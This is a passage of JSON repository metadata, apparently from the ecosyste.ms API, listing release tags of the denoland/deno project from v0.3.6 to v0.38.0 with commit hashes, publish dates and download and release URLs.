land%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms